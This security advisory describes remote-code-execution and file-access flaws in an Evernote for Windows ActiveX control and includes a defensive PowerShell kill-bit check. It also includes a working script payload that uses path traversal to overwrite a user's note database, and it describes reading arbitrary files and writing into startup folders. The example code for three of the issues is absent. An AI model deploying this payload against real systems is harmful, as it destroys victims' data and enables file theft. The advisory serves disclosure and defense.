SSD Advisory – Multiple Evernote Vulnerabilities

Introduction
Evernote lets you take notes, sync files across your devices, save webpages, capture inspiration, and share your ideas with friends and colleagues.
Vulnerability Details
Multiple vulnerabilities have been found in Evernote for Windows; they can lead to remote code execution.

The Evernote product installs an ActiveX Control with the following settings:

CLSID: {92EF2EAD-A7CE-4424-B0DB-499CF856608E}
ProgID: EvernoteIE.Addin.2
Binary Path: C:\Program Files\Evernote\Evernote\EvernoteIE.dll
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True

According to the Windows registry, this control is marked “Safe for Scripting” and “Safe for Initialization”. Given this, Internet Explorer will allow a web page to script its properties and methods, subject to the target user's browser security settings.
When the product is installed and Internet Explorer is started, the browser asks whether to enable the add-on. However, there is a high chance that a licensed user will enable all features to maximize the application’s use. On Windows XP the add-on is enabled by default and, given this, the described vulnerabilities will work without user interaction other than browsing a web page.
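To check whether a host still exposes this control to Internet Explorer, the following added PowerShell example (not part of the original advisory or of Evernote's code) reads the registration described above and can optionally set the control's kill bit. The CLSID is the one listed in the advisory; the two category IDs and the 0x400 "Compatibility Flags" value are the standard Windows ones, the function name `Get-ActiveXExposure` is hypothetical, and only machine-wide (HKLM) registrations are assumed.

```powershell
# Added example (not from the advisory): report how one ActiveX control is
# exposed to Internet Explorer and, optionally, set its kill bit.
$Clsid     = '{92EF2EAD-A7CE-4424-B0DB-499CF856608E}'  # CLSID from the advisory
$CatScript = '{7DD95801-9882-11CF-9FA9-00AA006C4320}'  # CATID_SafeForScripting
$CatInit   = '{7DD95802-9882-11CF-9FA9-00AA006C4320}'  # CATID_SafeForInitializing
$KillBit   = 0x400                                     # kill bit in "Compatibility Flags"

# Native and 32-bit (Wow6432Node) views of the machine-wide registration.
$Views = @(
    @{ Name    = 'native'
       Classes = 'HKLM:\SOFTWARE\Classes\CLSID'
       Compat  = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' },
    @{ Name    = 'wow64'
       Classes = 'HKLM:\SOFTWARE\Wow6432Node\Classes\CLSID'
       Compat  = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
)

# Hypothetical helper name. -SetKillBit requires an elevated session.
function Get-ActiveXExposure {
    param([switch]$SetKillBit)
    foreach ($v in $Views) {
        $clsKey = Join-Path $v.Classes $Clsid
        if (-not (Test-Path -LiteralPath $clsKey)) { continue }  # not registered in this view

        # Read the current compatibility flags; create the key only when asked to.
        $compatKey = Join-Path $v.Compat $Clsid
        $flags = 0
        if (Test-Path -LiteralPath $compatKey) {
            $flags = (Get-ItemProperty -LiteralPath $compatKey).'Compatibility Flags'
        } elseif ($SetKillBit) {
            New-Item -Path $compatKey -Force | Out-Null
        }
        if ($SetKillBit -and -not ($flags -band $KillBit)) {
            $flags = $flags -bor $KillBit   # keep any other flags already present
            Set-ItemProperty -LiteralPath $compatKey -Name 'Compatibility Flags' -Value $flags -Type DWord
        }

        $cats   = Join-Path $clsKey 'Implemented Categories'
        $server = Join-Path $clsKey 'InprocServer32'
        [pscustomobject]@{
            View             = $v.Name
            Binary           = (Get-ItemProperty -LiteralPath $server -ErrorAction SilentlyContinue).'(default)'
            SafeForScripting = Test-Path -LiteralPath (Join-Path $cats $CatScript)
            SafeForInit      = Test-Path -LiteralPath (Join-Path $cats $CatInit)
            KillBitSet       = [bool]($flags -band $KillBit)
        }
    }
}

Get-ActiveXExposure | Format-List
```

A host that reports `SafeForScripting` and `SafeForInit` as `True` with `KillBitSet` as `False` matches the registration described above; running `Get-ActiveXExposure -SetKillBit` from an elevated prompt stops Internet Explorer from instantiating the control.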
Vulnerabilities
The control offers various unsafe methods; see the typelib:

...
/* DISPID=1610743810 */
/* VT_VARIANT [12] */
function LoadFile(
/* VT_BSTR [8] [in] */ $scriptName
)
{
 /* method LoadFile */
}
...
...
/* DISPID=1610743840 */
/* VT_VARIANT [12] */
function ReadFileContent(
/* VT_BSTR [8] [in] */ $path
)
{
 /* method ReadFileContent */
}
/* DISPID=1610743841 */
function WriteFileContent(
/* VT_BSTR [8] [in] */ $path,
/* VT_BSTR [8] [in] */ $content
)
{
 /* method WriteFileContent */
}
...
...
/* DISPID=1610743858 */
/* VT_VARIANT [12] */
function GetLastLoginUser(
)
{
 /* method GetLastLoginUser */
}

[1] WriteFileContent
The WriteFileContent() method allows arbitrary files to be stored in arbitrary locations. It is possible to write into automatic startup folders if the user has the privileges to do so. Example code:


calc.exe will run at the next computer startup.
[2] ReadFileContent
The ReadFileContent() method can be abused to read arbitrary files from the target PC. Example code:

It will store the file content inside a variable; the file can then be stored on a remote network share through WriteFileContent().
[3] LoadFile
The LoadFile() method can be abused to read arbitrary files from the target PC. Example code:

This will store the content of win.ini in a variable. The variable could then be sent to a remote web server through JavaScript.
[4] GetLastLoginUser and WriteFileContent
Denial of service through GetLastLoginUser() and WriteFileContent(): this will overwrite the database file for the target user, if it is not in use, destroying all saved notes:

<script>
var obj = new ActiveXObject("EvernoteIE.Addin.2");
var x = obj.GetLastLoginUser();
document.write("<pre> " + x + "</pre>");
//modify the path, including the Windows username
try{
  obj.WriteFileContent("..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Users\\[Windows username]\\AppData\\Local\\Evernote\\Evernote\\Databases\\" + x + ".exb","aaaa");
}catch(e){
}
//otherwise try Administrator
try{
  obj.WriteFileContent("..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Users\\Administrator\\AppData\\Local\\Evernote\\Evernote\\Databases\\" + x + ".exb","aaaa");
}catch(e){
}
</script>

The only limitation on Windows 7 (and newer) is that UAC (if enabled) will prevent files from being written; however, code execution could still be possible by reading specific configuration files which may contain authentication credentials.
Vulnerable Version
Evernote for Windows 5.7.2
Footnote
We attempted to report these vulnerabilities in March 2015 but did not receive any answer; a follow-up tweet in July asked us to resend the information, which got us a prompt response.
Vendor Response

We’ve already credited another researcher for these findings, and believe they were addressed in the 5.8 release of Evernote for Windows.
We received the first report from “In-Gyu, Tae” via KrCERT in November 2014, after they claimed to have gotten no response from US-CERT in August 2014. We weren’t doing release notes at the time. I’m embarrassed to say that the commit that credited In-Gyu, Tae for identifying these problems was stashed and not committed at the time, which I’ve just rectified.
